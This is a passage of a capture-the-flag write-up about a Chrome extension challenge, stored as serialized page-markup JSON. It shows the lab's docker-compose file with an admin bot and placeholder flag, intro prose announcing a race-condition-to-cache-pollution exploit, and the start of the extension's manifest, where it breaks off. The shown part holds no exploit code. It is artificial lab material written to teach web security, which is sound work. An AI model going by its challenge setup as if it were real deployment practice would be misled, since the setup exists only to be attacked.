networks:\n - internal\n depends_on:\n - bot\n bot:\n build: bot\n restart: always\n environment:\n APPNAME: Admin\n APPURL: http://proxy/\n APPURLREGEX: ^http(|s)://.*$\n APPFLAG: fake{flag}\n APPLIMIT: 2\n APPLIMITTIME: 60\n USE_PROXY: 1\n DISPLAY: ${DISPLAY}\n networks:\n - internal\n # uncoment this if you need to run the bot in GUI mode\n # volumes:\n # - /tmp/.X11-unix:/tmp/.X11-unix\n\nnetworks:\n internal:\n",[11552],{"type":33,"tag":105,"props":11553,"children":11554},{"__ignoreMap":8},[11555,11579,11586,11598,11610,11627,11644,11656,11669,11681,11693,11705,11717,11729,11741,11753,11765,11781,11796,11808,11825,11842,11859,11876,11893,11910,11926,11943,11954,11965,11973,11981,11989,11996,12008],{"type":33,"tag":128,"props":11556,"children":11557},{"class":130,"line":131},[11558,11563,11567,11571,11575],{"type":33,"tag":128,"props":11559,"children":11560},{"style":437},[11561],{"type":38,"value":11562},"version",{"type":33,"tag":128,"props":11564,"children":11565},{"style":312},[11566],{"type":38,"value":284},{"type":33,"tag":128,"props":11568,"children":11569},{"style":676},[11570],{"type":38,"value":6739},{"type":33,"tag":128,"props":11572,"children":11573},{"style":140},[11574],{"type":38,"value":8225},{"type":33,"tag":128,"props":11576,"children":11577},{"style":676},[11578],{"type":38,"value":10313},{"type":33,"tag":128,"props":11580,"children":11581},{"class":130,"line":362},[11582],{"type":33,"tag":128,"props":11583,"children":11584},{"emptyLinePlaceholder":896},[11585],{"type":38,"value":899},{"type":33,"tag":128,"props":11587,"children":11588},{"class":130,"line":403},[11589,11594],{"type":33,"tag":128,"props":11590,"children":11591},{"style":437},[11592],{"type":38,"value":11593},"services",{"type":33,"tag":128,"props":11595,"children":11596},{"style":312},[11597],{"type":38,"value":5318},{"type":33,"tag":128,"props":11599,"children":11600},{"class":130,"line":739},[11601,11606],{"type":33,"tag":128,"props":11602,"children":11603},{"style":437},[11604],{"type":38,"value":11605}," proxy",{"type":33,"tag":128,"props":11607,"children":11608},{"style":312},[11609],{"type":38,"value":5318},{"type":33,"tag":128,"props":11611,"children":11612},{"class":130,"line":765},[11613,11618,11622],{"type":33,"tag":128,"props":11614,"children":11615},{"style":437},[11616],{"type":38,"value":11617}," image",{"type":33,"tag":128,"props":11619,"children":11620},{"style":312},[11621],{"type":38,"value":284},{"type":33,"tag":128,"props":11623,"children":11624},{"style":140},[11625],{"type":38,"value":11626}," nginx:latest\n",{"type":33,"tag":128,"props":11628,"children":11629},{"class":130,"line":804},[11630,11635,11639],{"type":33,"tag":128,"props":11631,"children":11632},{"style":437},[11633],{"type":38,"value":11634}," restart",{"type":33,"tag":128,"props":11636,"children":11637},{"style":312},[11638],{"type":38,"value":284},{"type":33,"tag":128,"props":11640,"children":11641},{"style":140},[11642],{"type":38,"value":11643}," always\n",{"type":33,"tag":128,"props":11645,"children":11646},{"class":130,"line":839},[11647,11652],{"type":33,"tag":128,"props":11648,"children":11649},{"style":437},[11650],{"type":38,"value":11651}," ports",{"type":33,"tag":128,"props":11653,"children":11654},{"style":312},[11655],{"type":38,"value":5318},{"type":33,"tag":128,"props":11657,"children":11658},{"class":130,"line":848},[11659,11664],{"type":33,"tag":128,"props":11660,"children":11661},{"style":312},[11662],{"type":38,"value":11663}," -",{"type":33,"tag":128,"props":11665,"children":11666},{"style":140},[11667],{"type":38,"value":11668}," 8547:80\n",{"type":33,"tag":128,"props":11670,"children":11671},{"class":130,"line":976},[11672,11677],{"type":33,"tag":128,"props":11673,"children":11674},{"style":437},[11675],{"type":38,"value":11676}," volumes",{"type":33,"tag":128,"props":11678,"children":11679},{"style":312},[11680],{"type":38,"value":5318},{"type":33,"tag":128,"props":11682,"children":11683},{"class":130,"line":988},[11684,11688],{"type":33,"tag":128,"props":11685,"children":11686},{"style":312},[11687],{"type":38,"value":11663},{"type":33,"tag":128,"props":11689,"children":11690},{"style":140},[11691],{"type":38,"value":11692}," ./src:/var/www/html:ro\n",{"type":33,"tag":128,"props":11694,"children":11695},{"class":130,"line":1001},[11696,11700],{"type":33,"tag":128,"props":11697,"children":11698},{"style":312},[11699],{"type":38,"value":11663},{"type":33,"tag":128,"props":11701,"children":11702},{"style":140},[11703],{"type":38,"value":11704}," ./proxy.conf:/etc/nginx/conf.d/default.conf:ro\n",{"type":33,"tag":128,"props":11706,"children":11707},{"class":130,"line":1014},[11708,11713],{"type":33,"tag":128,"props":11709,"children":11710},{"style":437},[11711],{"type":38,"value":11712}," networks",{"type":33,"tag":128,"props":11714,"children":11715},{"style":312},[11716],{"type":38,"value":5318},{"type":33,"tag":128,"props":11718,"children":11719},{"class":130,"line":1026},[11720,11724],{"type":33,"tag":128,"props":11721,"children":11722},{"style":312},[11723],{"type":38,"value":11663},{"type":33,"tag":128,"props":11725,"children":11726},{"style":140},[11727],{"type":38,"value":11728}," internal\n",{"type":33,"tag":128,"props":11730,"children":11731},{"class":130,"line":1038},[11732,11737],{"type":33,"tag":128,"props":11733,"children":11734},{"style":437},[11735],{"type":38,"value":11736}," depends_on",{"type":33,"tag":128,"props":11738,"children":11739},{"style":312},[11740],{"type":38,"value":5318},{"type":33,"tag":128,"props":11742,"children":11743},{"class":130,"line":1051},[11744,11748],{"type":33,"tag":128,"props":11745,"children":11746},{"style":312},[11747],{"type":38,"value":11663},{"type":33,"tag":128,"props":11749,"children":11750},{"style":140},[11751],{"type":38,"value":11752}," bot\n",{"type":33,"tag":128,"props":11754,"children":11755},{"class":130,"line":1063},[11756,11761],{"type":33,"tag":128,"props":11757,"children":11758},{"style":437},[11759],{"type":38,"value":11760}," bot",{"type":33,"tag":128,"props":11762,"children":11763},{"style":312},[11764],{"type":38,"value":5318},{"type":33,"tag":128,"props":11766,"children":11767},{"class":130,"line":1076},[11768,11773,11777],{"type":33,"tag":128,"props":11769,"children":11770},{"style":437},[11771],{"type":38,"value":11772}," build",{"type":33,"tag":128,"props":11774,"children":11775},{"style":312},[11776],{"type":38,"value":284},{"type":33,"tag":128,"props":11778,"children":11779},{"style":140},[11780],{"type":38,"value":11752},{"type":33,"tag":128,"props":11782,"children":11783},{"class":130,"line":1089},[11784,11788,11792],{"type":33,"tag":128,"props":11785,"children":11786},{"style":437},[11787],{"type":38,"value":11634},{"type":33,"tag":128,"props":11789,"children":11790},{"style":312},[11791],{"type":38,"value":284},{"type":33,"tag":128,"props":11793,"children":11794},{"style":140},[11795],{"type":38,"value":11643},{"type":33,"tag":128,"props":11797,"children":11798},{"class":130,"line":1101},[11799,11804],{"type":33,"tag":128,"props":11800,"children":11801},{"style":437},[11802],{"type":38,"value":11803}," environment",{"type":33,"tag":128,"props":11805,"children":11806},{"style":312},[11807],{"type":38,"value":5318},{"type":33,"tag":128,"props":11809,"children":11810},{"class":130,"line":1114},[11811,11816,11820],{"type":33,"tag":128,"props":11812,"children":11813},{"style":437},[11814],{"type":38,"value":11815}," APPNAME",{"type":33,"tag":128,"props":11817,"children":11818},{"style":312},[11819],{"type":38,"value":284},{"type":33,"tag":128,"props":11821,"children":11822},{"style":140},[11823],{"type":38,"value":11824}," Admin\n",{"type":33,"tag":128,"props":11826,"children":11827},{"class":130,"line":1127},[11828,11833,11837],{"type":33,"tag":128,"props":11829,"children":11830},{"style":437},[11831],{"type":38,"value":11832}," APPURL",{"type":33,"tag":128,"props":11834,"children":11835},{"style":312},[11836],{"type":38,"value":284},{"type":33,"tag":128,"props":11838,"children":11839},{"style":140},[11840],{"type":38,"value":11841}," http://proxy/\n",{"type":33,"tag":128,"props":11843,"children":11844},{"class":130,"line":1139},[11845,11850,11854],{"type":33,"tag":128,"props":11846,"children":11847},{"style":437},[11848],{"type":38,"value":11849}," APPURLREGEX",{"type":33,"tag":128,"props":11851,"children":11852},{"style":312},[11853],{"type":38,"value":284},{"type":33,"tag":128,"props":11855,"children":11856},{"style":140},[11857],{"type":38,"value":11858}," ^http(|s)://.*$\n",{"type":33,"tag":128,"props":11860,"children":11861},{"class":130,"line":1152},[11862,11867,11871],{"type":33,"tag":128,"props":11863,"children":11864},{"style":437},[11865],{"type":38,"value":11866}," APPFLAG",{"type":33,"tag":128,"props":11868,"children":11869},{"style":312},[11870],{"type":38,"value":284},{"type":33,"tag":128,"props":11872,"children":11873},{"style":140},[11874],{"type":38,"value":11875}," fake{flag}\n",{"type":33,"tag":128,"props":11877,"children":11878},{"class":130,"line":1165},[11879,11884,11888],{"type":33,"tag":128,"props":11880,"children":11881},{"style":437},[11882],{"type":38,"value":11883}," APPLIMIT",{"type":33,"tag":128,"props":11885,"children":11886},{"style":312},[11887],{"type":38,"value":284},{"type":33,"tag":128,"props":11889,"children":11890},{"style":523},[11891],{"type":38,"value":11892}," 2\n",{"type":33,"tag":128,"props":11894,"children":11895},{"class":130,"line":1177},[11896,11901,11905],{"type":33,"tag":128,"props":11897,"children":11898},{"style":437},[11899],{"type":38,"value":11900}," APPLIMITTIME",{"type":33,"tag":128,"props":11902,"children":11903},{"style":312},[11904],{"type":38,"value":284},{"type":33,"tag":128,"props":11906,"children":11907},{"style":523},[11908],{"type":38,"value":11909}," 60\n",{"type":33,"tag":128,"props":11911,"children":11912},{"class":130,"line":1189},[11913,11918,11922],{"type":33,"tag":128,"props":11914,"children":11915},{"style":437},[11916],{"type":38,"value":11917}," USE_PROXY",{"type":33,"tag":128,"props":11919,"children":11920},{"style":312},[11921],{"type":38,"value":284},{"type":33,"tag":128,"props":11923,"children":11924},{"style":523},[11925],{"type":38,"value":1338},{"type":33,"tag":128,"props":11927,"children":11928},{"class":130,"line":1202},[11929,11934,11938],{"type":33,"tag":128,"props":11930,"children":11931},{"style":437},[11932],{"type":38,"value":11933}," DISPLAY",{"type":33,"tag":128,"props":11935,"children":11936},{"style":312},[11937],{"type":38,"value":284},{"type":33,"tag":128,"props":11939,"children":11940},{"style":140},[11941],{"type":38,"value":11942}," ${DISPLAY}\n",{"type":33,"tag":128,"props":11944,"children":11945},{"class":130,"line":1214},[11946,11950],{"type":33,"tag":128,"props":11947,"children":11948},{"style":437},[11949],{"type":38,"value":11712},{"type":33,"tag":128,"props":11951,"children":11952},{"style":312},[11953],{"type":38,"value":5318},{"type":33,"tag":128,"props":11955,"children":11956},{"class":130,"line":1226},[11957,11961],{"type":33,"tag":128,"props":11958,"children":11959},{"style":312},[11960],{"type":38,"value":11663},{"type":33,"tag":128,"props":11962,"children":11963},{"style":140},[11964],{"type":38,"value":11728},{"type":33,"tag":128,"props":11966,"children":11967},{"class":130,"line":1239},[11968],{"type":33,"tag":128,"props":11969,"children":11970},{"style":5541},[11971],{"type":38,"value":11972}," # uncoment this if you need to run the bot in GUI mode\n",{"type":33,"tag":128,"props":11974,"children":11975},{"class":130,"line":1251},[11976],{"type":33,"tag":128,"props":11977,"children":11978},{"style":5541},[11979],{"type":38,"value":11980}," # volumes:\n",{"type":33,"tag":128,"props":11982,"children":11983},{"class":130,"line":1263},[11984],{"type":33,"tag":128,"props":11985,"children":11986},{"style":5541},[11987],{"type":38,"value":11988}," # - /tmp/.X11-unix:/tmp/.X11-unix\n",{"type":33,"tag":128,"props":11990,"children":11991},{"class":130,"line":1276},[11992],{"type":33,"tag":128,"props":11993,"children":11994},{"emptyLinePlaceholder":896},[11995],{"type":38,"value":899},{"type":33,"tag":128,"props":11997,"children":11998},{"class":130,"line":1288},[11999,12004],{"type":33,"tag":128,"props":12000,"children":12001},{"style":437},[12002],{"type":38,"value":12003},"networks",{"type":33,"tag":128,"props":12005,"children":12006},{"style":312},[12007],{"type":38,"value":5318},{"type":33,"tag":128,"props":12009,"children":12010},{"class":130,"line":1300},[12011,12016],{"type":33,"tag":128,"props":12012,"children":12013},{"style":437},[12014],{"type":38,"value":12015}," internal",{"type":33,"tag":128,"props":12017,"children":12018},{"style":312},[12019],{"type":38,"value":5318},{"type":33,"tag":47,"props":12021,"children":12022},{},[12023],{"type":38,"value":12024},"The writeup will therefore focus on the parts specific to the web extension and web service. We will see how the extension works, how to exploit it, and how to retrieve the flag:",{"type":33,"tag":75,"props":12026,"children":12029},{"imgSrc":12027,":width":12028},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731248622/writeups/shikanoko/source_code.webp","350",[],{"type":33,"tag":40,"props":12031,"children":12033},{"id":12032},"how-does-a-web-extension-work",[12034],{"type":38,"value":12035},"How does a web extension work?",{"type":33,"tag":47,"props":12037,"children":12038},{},[12039,12041,12047],{"type":38,"value":12040},"It is important to review how a web extension works. If you are comfortable with this concept, I advise you to move on to the next chapter: ",{"type":33,"tag":53,"props":12042,"children":12044},{"href":12043},"#race-condition-to-chrome-cache-pollution",[12045],{"type":38,"value":12046},"Race condition to chrome cache pollution",{"type":38,"value":215},{"type":33,"tag":47,"props":12049,"children":12050},{},[12051],{"type":38,"value":12052},"Despite the paradigm being the same (a browser), a web application will have a different architecture and files than a simple web page. This is what we are going to see below:",{"type":33,"tag":88,"props":12054,"children":12056},{"id":12055},"manifest-file",[12057],{"type":38,"value":12058},"Manifest File:",{"type":33,"tag":47,"props":12060,"children":12061},{},[12062],{"type":38,"value":12063},"Every extension has a manifest.json file, which is the blueprint of the extension. It defines the permissions, version, name, scripts, and features of the extension.",{"type":33,"tag":47,"props":12065,"children":12066},{},[12067],{"type":38,"value":12068},"Here below is the manifest of the challenge application:",{"type":33,"tag":114,"props":12070,"children":12071},{"lang":633},[12072],{"type":33,"tag":119,"props":12073,"children":12075},{"className":637,"code":12074,"language":633,"meta":8,"style":8},"{\n \"manifest_version\": 3,\n \"name\": \"Custom Extension\",\n \"$schema\": \"https://json.schemastore.org/chrome-manifest.json\",\n \"version\": \"0.1.0\",\n \"description\": \"My Chrome Extension\",\n \"icons\": {\n \"16\": \"icons/icon_16.png\",\n \"32\": \"icons/icon_32.png\",\n \"48\": \"icons/icon_48.png\",\n \"128\": \"icons/icon_128.png\"\n },\n \"background\": {\n \"service_worker\": \"background.js\"\n },\n \"action\": {\n \"default_title\": \"Custom Extension\",\n \"default_popup\": \"popup.html\"\n },\n \"permissions\": [\n \"storage\",\n \"tabs\"\n ],\n \"content_scripts\": [\n {\n \"matches\": [\n \"\u003Call_urls>\"\n ],\n \"run_at\": \"document_idle\",\n \"js\": [\n \"contentScript.js\"\n ]\n }\n ]\n}\n\n",[12076],{"type":33,"tag":105,"props":12077,"children":12078},{"__ignoreMap":8},[12079,12086,12115,12152,12189,12225,12262,12286,12323,12360,12397,12430,12438,12462,12495,12502,12526,12562,12595,12602,12625,12645,12661,12668,12692,12700,12725,12742,12750,12787,12810,12826,12834,12841,12848],{"type":33,"tag":128,"props":12080,"children":12081},{"class":130,"line":131},[12082],{"type":33,"tag":128,"props":12083,"children":12084},{"style":312},[12085],{"type":38,"value":650},{"type":33,"tag":128,"props":12087,"children":12088},{"class":130,"line":362},[12089,12093,12098,12102,12106,12111],{"type":33,"tag":128,"props":12090,"children":12091},{"style":656},[12092],{"type":38,"value":659},{"type":33,"tag":128,"props":12094,"children":12095},{"style":437},[12096],{"type":38,"value":12097},"manifest_version",{"type":33,"tag":128,"props":12099,"children":12100},{"style":656},[12101],{"type":38,"value":669},{"type":33,"tag":128,"props":12103,"children":12104},{"style":312},[12105],{"type":38,"value":284},{"type":33,"tag":128,"props":12107,"children":12108},{"style":523},[12109],{"type":38,"value":12110}," 3",{"type":33,"tag":128,"props":12112,"children":12113},{"style":312},[12114],{"type":38,"value":693},{"type":33,"tag":128,"props":12116,"children":12117},{"class":130,"line":403},[12118,12122,12127,12131,12135,12139,12144,12148],{"type":33,"tag":128,"props":12119,"children":12120},{"style":656},[12121],{"type":38,"value":659},{"type":33,"tag":128,"props":12123,"children":12124},{"style":437},[12125],{"type":38,"value":12126},"name",{"type":33,"tag":128,"props":12128,"children":12129},{"style":656},[12130],{"type":38,"value":669},{"type":33,"tag":128,"props":12132,"children":12133},{"style":312},[12134],{"type":38,"value":284},{"type":33,"tag":128,"props":12136,"children":12137},{"style":676},[12138],{"type":38,"value":679},{"type":33,"tag":128,"props":12140,"children":12141},{"style":140},[12142],{"type":38,"value":12143},"Custom Extension",{"type":33,"tag":128,"props":12145,"children":12146},{"style":676},[12147],{"type":38,"value":669},{"type":33,"tag":128,"props":12149,"children":12150},{"style":312},[12151],{"type":38,"value":693},{"type":33,"tag":128,"props":12153,"children":12154},{"class":130,"line":739},[12155,12159,12164,12168,12172,12176,12181,12185],{"type":33,"tag":128,"props":12156,"children":12157},{"style":656},[12158],{"type":38,"value":659},{"type":33,"tag":128,"props":12160,"children":12161},{"style":437},[12162],{"type":38,"value":12163},"$schema",{"type":33,"tag":128,"props":12165,"children":12166},{"style":656},[12167],{"type":38,"value":669},{"type":33,"tag":128,"props":12169,"children":12170},{"style":312},[12171],{"type":38,"value":284},{"type":33,"tag":128,"props":12173,"children":12174},{"style":676},[12175],{"type":38,"value":679},{"type":33,"tag":128,"props":12177,"children":12178},{"style":140},[12179],{"type":38,"value":12180},"https://json.schemastore.org/chrome-manifest.json",{"type":33,"tag":128,"props":12182,"children":12183},{"style":676},[12184],{"type":38,"value":669},{"type":33,"tag":128,"props":12186,"children":12187},{"style":312},[12188],{"type":38,"value":693},{"type":33,"tag":128,"props":12190,"children":12191},{"class":130,"line":765},[12192,12196,12200,12204,12208,12212,12217,12221],{"type":33,"tag":128,"props":12193,"children":12194},{"style":656},[12195],{"type":38,"value":659},{"type":33,"tag":128,"props":12197,"children":12198},{"style":437},[12199],{"type":38,"value":11562},{"type":33,"tag":128,"props":12201,"children":12202},{"style":656},[12203],{"type":38,"value":669},{"type":33,"tag":128,"props":12205,"children":12206},{"style":312},[12207],{"type":38,"value":284},{"type":33,"tag":128,"props":12209,"children":12210},{"style":676},[12211],{"type":38,"value":679},{"type":33,"tag":128,"props":12213,"children":12214},{"style":140},[12215],{"type":38,"value":12216},"0.1.0",{"type":33,"tag":128,"props":12218,"children":12219},{"style":676},[12220],{"type":38,"value":669},{"type":33,"tag":128,"props":12222,"children":12223},{"style":312},[12224],{"type":38,"value":693},{"type":33,"tag":128,"props":12226,"children":12227},{"class":130,"line":804},[12228,12232,12237,12241,12245,12249,12254,12258],{"type":33,"tag":128,"props":12229,"children":12230},{"style":656},[12231],{"type":38,"value":659},{"type":33,"tag":128,"props":12233,"children":12234},{"style":437},[12235],{"type":38,"value":12236},"description",{"type":33,"tag":128,"props":12238,"children":12239},{"style":656},[12240],{"type":38,"value":669},{"type":33,"tag":128,"props":12242,"children":12243},{"style":312},[12244],{"type":38,"value":284},{"type":33,"tag":128,"props":12246,"children":12247},{"style":676},[12248],{"type":38,"value":679},{"type":33,"tag":128,"props":12250,"children":12251},{"style":140},[12252],{"type":38,"value":12253},"My Chrome Extension",{"type":33,"tag":128,"props":12255,"children":12256},{"style":676},[12257],{"type":38,"value":669},{"type":33,"tag":128,"props":12259,"children":12260},{"style":312},[12261],{"type":38,"value":693},{"type":33,"tag":128,"props":12263,"children":12264},{"class":130,"line":839},[12265,12269,12274,12278,12282],{"type":33,"tag":128,"props":12266,"children":12267},{"style":656},[12268],{"type":38,"value":659},{"type":33,"tag":128,"props":12270,"children":12271},{"style":437},[12272],{"type":38,"value":12273},"icons",{"type":33,"tag":128,"props":12275,"children":12276},{"style":656},[12277],{"type":38,"value":669},{"type":33,"tag":128,"props":12279,"children":12280},{"style":312},[12281],{"type":38,"value":284},{"type":33,"tag":128,"props":12283,"children":12284},{"style":312},[12285],{"type":38,"value":762},{"type":33,"tag":128,"props":12287,"children":12288},{"class":130,"line":848},[12289,12293,12298,12302,12306,12310,12315,12319],{"type":33,"tag":128,"props":12290,"children":12291},{"style":656},[12292],{"type":38,"value":771},{"type":33,"tag":128,"props":12294,"children":12295},{"style":437},[12296],{"type":38,"value":12297},"16",{"type":33,"tag":128,"props":12299,"children":12300},{"style":656},[12301],{"type":38,"value":669},{"type":33,"tag":128,"props":12303,"children":12304},{"style":312},[12305],{"type":38,"value":284},{"type":33,"tag":128,"props":12307,"children":12308},{"style":676},[12309],{"type":38,"value":679},{"type":33,"tag":128,"props":12311,"children":12312},{"style":140},[12313],{"type":38,"value":12314},"icons/icon_16.png",{"type":33,"tag":128,"props":12316,"children":12317},{"style":676},[12318],{"type":38,"value":669},{"type":33,"tag":128,"props":12320,"children":12321},{"style":312},[12322],{"type":38,"value":693},{"type":33,"tag":128,"props":12324,"children":12325},{"class":130,"line":976},[12326,12330,12335,12339,12343,12347,12352,12356],{"type":33,"tag":128,"props":12327,"children":12328},{"style":656},[12329],{"type":38,"value":771},{"type":33,"tag":128,"props":12331,"children":12332},{"style":437},[12333],{"type":38,"value":12334},"32",{"type":33,"tag":128,"props":12336,"children":12337},{"style":656},[12338],{"type":38,"value":669},{"type":33,"tag":128,"props":12340,"children":12341},{"style":312},[12342],{"type":38,"value":284},{"type":33,"tag":128,"props":12344,"children":12345},{"style":676},[12346],{"type":38,"value":679},{"type":33,"tag":128,"props":12348,"children":12349},{"style":140},[12350],{"type":38,"value":12351},"icons/icon_32.png",{"type":33,"tag":128,"props":12353,"children":12354},{"style":676},[12355],{"type":38,"value":669},{"type":33,"tag":128,"props":12357,"children":12358},{"style":312},[12359],{"type":38,"value":693},{"type":33,"tag":128,"props":12361,"children":12362},{"class":130,"line":988},[12363,12367,12372,12376,12380,12384,12389,12393],{"type":33,"tag":128,"props":12364,"children":12365},{"style":656},[12366],{"type":38,"value":771},{"type":33,"tag":128,"props":12368,"children":12369},{"style":437},[12370],{"type":38,"value":12371},"48",{"type":33,"tag":128,"props":12373,"children":12374},{"style":656},[12375],{"type":38,"value":669},{"type":33,"tag":128,"props":12377,"children":12378},{"style":312},[12379],{"type":38,"value":284},{"type":33,"tag":128,"props":12381,"children":12382},{"style":676},[12383],{"type":38,"value":679},{"type":33,"tag":128,"props":12385,"children":12386},{"style":140},[12387],{"type":38,"value":12388},"icons/icon_48.png",{"type":33,"tag":128,"props":12390,"children":12391},{"style":676},[12392],{"type":38,"value":669},{"type":33,"tag":128,"props":12394,"children":12395},{"style":312},[12396],{"type":38,"value":693},{"type":33,"tag":128,"props":12398,"children":12399},{"class":130,"line":1001},[12400,12404,12409,12413,12417,12421,12426],{"type":33,"tag":128,"props":12401,"children":12402},{"style":656},[12403],{"type":38,"value":771},{"type":33,"tag":128,"props":12405,"children":12406},{"style":437},[12407],{"type":38,"value":12408},"128",{"type":33,"tag":128,"props":12410,"children":12411},{"style":656},[12412],{"type":38,"value":669},{"type":33,"tag":128,"props":12414,"children":12415},{"style":312},[12416],{"type":38,"value":284},{"type":33,"tag":128,"props":12418,"children":12419},{"style":676},[12420],{"type":38,"value":679},{"type":33,"tag":128,"props":12422,"children":12423},{"style":140},[12424],{"type":38,"value":12425},"icons/icon_128.png",{"type":33,"tag":128,"props":12427,"children":12428},{"style":676},[12429],{"type":38,"value":836},{"type":33,"tag":128,"props":12431,"children":12432},{"class":130,"line":1014},[12433],{"type":33,"tag":128,"props":12434,"children":12435},{"style":312},[12436],{"type":38,"value":12437}," },\n",{"type":33,"tag":128,"props":12439,"children":12440},{"class":130,"line":1026},[12441,12445,12450,12454,12458],{"type":33,"tag":128,"props":12442,"children":12443},{"style":656},[12444],{"type":38,"value":659},{"type":33,"tag":128,"props":12446,"children":12447},{"style":437},[12448],{"type":38,"value":12449},"background",{"type":33,"tag":128,"props":12451,"children":12452},{"style":656},[12453],{"type":38,"value":669},{"type":33,"tag":128,"props":12455,"children":12456},{"style":312},[12457],{"type":38,"value":284},{"type":33,"tag":128,"props":12459,"children":12460},{"style":312},[12461],{"type":38,"value":762},{"type":33,"tag":128,"props":12463,"children":12464},{"class":130,"line":1038},[12465,12469,12474,12478,12482,12486,12491],{"type":33,"tag":128,"props":12466,"children":12467},{"style":656},[12468],{"type":38,"value":771},{"type":33,"tag":128,"props":12470,"children":12471},{"style":437},[12472],{"type":38,"value":12473},"service_worker",{"type":33,"tag":128,"props":12475,"children":12476},{"style":656},[12477],{"type":38,"value":669},{"type":33,"tag":128,"props":12479,"children":12480},{"style":312},[12481],{"type":38,"value":284},{"type":33,"tag":128,"props":12483,"children":12484},{"style":676},[12485],{"type":38,"value":679},{"type":33,"tag":128,"props":12487,"children":12488},{"style":140},[12489],{"type":38,"value":12490},"background.js",{"type":33,"tag":128,"props":12492,"children":12493},{"style":676},[12494],{"type":38,"value":836},{"type":33,"tag":128,"props":12496,"children":12497},{"class":130,"line":1051},[12498],{"type":33,"tag":128,"props":12499,"children":12500},{"style":312},[12501],{"type":38,"value":12437},{"type":33,"tag":128,"props":12503,"children":12504},{"class":130,"line":1063},[12505,12509,12514,12518,12522],{"type":33,"tag":128,"props":12506,"children":12507},{"style":656},[12508],{"type":38,"value":659},{"type":33,"tag":128,"props":12510,"children":12511},{"style":437},[12512],{"type":38,"value":12513},"action",{"type":33,"tag":128,"props":12515,"children":12516},{"style":656},[12517],{"type":38,"value":669},{"type":33,"tag":128,"props":12519,"children":12520},{"style":312},[12521],{"type":38,"value":284},{"type":33,"tag":128,"props":12523,"children":12524},{"style":312},[12525],{"type":38,"value":762},{"type":33,"tag":128,"props":12527,"children":12528},{"class":130,"line":1076},[12529,12533,12538,12542,12546,12550,12554,12558],{"type":33,"tag":128,"props":12530,"children":12531},{"style":656},[12532],{"type":38,"value":771},{"type":33,"tag":128,"props":12534,"children":12535},{"style":437},[12536],{"type":38,"value":12537},"default_title",{"type":33,"tag":128,"props":12539,"children":12540},{"style":656},[12541],{"type":38,"value":669},{"type":33,"tag":128,"props":12543,"children":12544},{"style":312},[12545],{"type":38,"value":284},{"type":33,"tag":128,"props":12547,"children":12548},{"style":676},[12549],{"type":38,"value":679},{"type":33,"tag":128,"props":12551,"children":12552},{"style":140},[12553],{"type":38,"value":12143},{"type":33,"tag":128,"props":12555,"children":12556},{"style":676},[12557],{"type":38,"value":669},{"type":33,"tag":128,"props":12559,"children":12560},{"style":312},[12561],{"type":38,"value":693},{"type":33,"tag":128,"props":12563,"children":12564},{"class":130,"line":1089},[12565,12569,12574,12578,12582,12586,12591],{"type":33,"tag":128,"props":12566,"children":12567},{"style":656},[12568],{"type":38,"value":771},{"type":33,"tag":128,"props":12570,"children":12571},{"style":437},[12572],{"type":38,"value":12573},"default_popup",{"type":33,"tag":128,"props":12575,"children":12576},{"style":656},[12577],{"type":38,"value":669},{"type":33,"tag":128,"props":12579,"children":12580},{"style":312},[12581],{"type":38,"value":284},{"type":33,"tag":128,"props":12583,"children":12584},{"style":676},[12585],{"type":38,"value":679},{"type":33,"tag":128,"props":12587,"children":12588},{"style":140},[12589],{"type":38,"value":12590},"popup.html",{"type":33,"tag":128,"props":12592,"children":12593},{"style":676},[12594],{"type":38,"value":836},{"type":33,"tag":128,"props":12596,"children":12597},{"class":130,"line":1101},[12598],{"type":33,"tag":128,"props":12599,"children":12600},{"style":312},[12601],{"type":38,"value":12437},{"type":33,"tag":128,"props":12603,"children":12604},{"class":130,"line":1114},[12605,12609,12613,12617,12621],{"type":33,"tag":128,"props":12606,"children":12607},{"style":656},[12608],{"type":38,"value":659},{"type":33,"tag":128,"props":12610,"children":12611},{"style":437},[12612],{"type":38,"value":1453},{"type":33,"tag":128,"props":12614,"children":12615},{"style":656},[12616],{"type":38,"value":669},{"type":33,"tag":128,"props":12618,"children":12619},{"style":312},[12620],{"type":38,"value":284},{"type":33,"tag":128,"props":12622,"children":12623},{"style":312},[12624],{"type":38,"value":1466},{"type":33,"tag":128,"props":12626,"children":12627},{"class":130,"line":1127},[12628,12632,12637,12641],{"type":33,"tag":128,"props":12629,"children":12630},{"style":676},[12631],{"type":38,"value":771},{"type":33,"tag":128,"props":12633,"children":12634},{"style":140},[12635],{"type":38,"value":12636},"storage",{"type":33,"tag":128,"props":12638,"children":12639},{"style":676},[12640],{"type":38,"value":669},{"type":33,"tag":128,"props":12642,"children":12643},{"style":312},[12644],{"type":38,"value":693},{"type":33,"tag":128,"props":12646,"children":12647},{"class":130,"line":1139},[12648,12652,12657],{"type":33,"tag":128,"props":12649,"children":12650},{"style":676},[12651],{"type":38,"value":771},{"type":33,"tag":128,"props":12653,"children":12654},{"style":140},[12655],{"type":38,"value":12656},"tabs",{"type":33,"tag":128,"props":12658,"children":12659},{"style":676},[12660],{"type":38,"value":836},{"type":33,"tag":128,"props":12662,"children":12663},{"class":130,"line":1152},[12664],{"type":33,"tag":128,"props":12665,"children":12666},{"style":312},[12667],{"type":38,"value":2155},{"type":33,"tag":128,"props":12669,"children":12670},{"class":130,"line":1165},[12671,12675,12680,12684,12688],{"type":33,"tag":128,"props":12672,"children":12673},{"style":656},[12674],{"type":38,"value":659},{"type":33,"tag":128,"props":12676,"children":12677},{"style":437},[12678],{"type":38,"value":12679},"content_scripts",{"type":33,"tag":128,"props":12681,"children":12682},{"style":656},[12683],{"type":38,"value":669},{"type":33,"tag":128,"props":12685,"children":12686},{"style":312},[12687],{"type":38,"value":284},{"type":33,"tag":128,"props":12689,"children":12690},{"style":312},[12691],{"type":38,"value":1466},{"type":33,"tag":128,"props":12693,"children":12694},{"class":130,"line":1177},[12695],{"type":33,"tag":128,"props":12696,"children":12697},{"style":312},[12698],{"type":38,"value":12699}," {\n",{"type":33,"tag":128,"props":12701,"children":12702},{"class":130,"line":1189},[12703,12708,12713,12717,12721],{"type":33,"tag":128,"props":12704,"children":12705},{"style":656},[12706],{"type":38,"value":12707}," 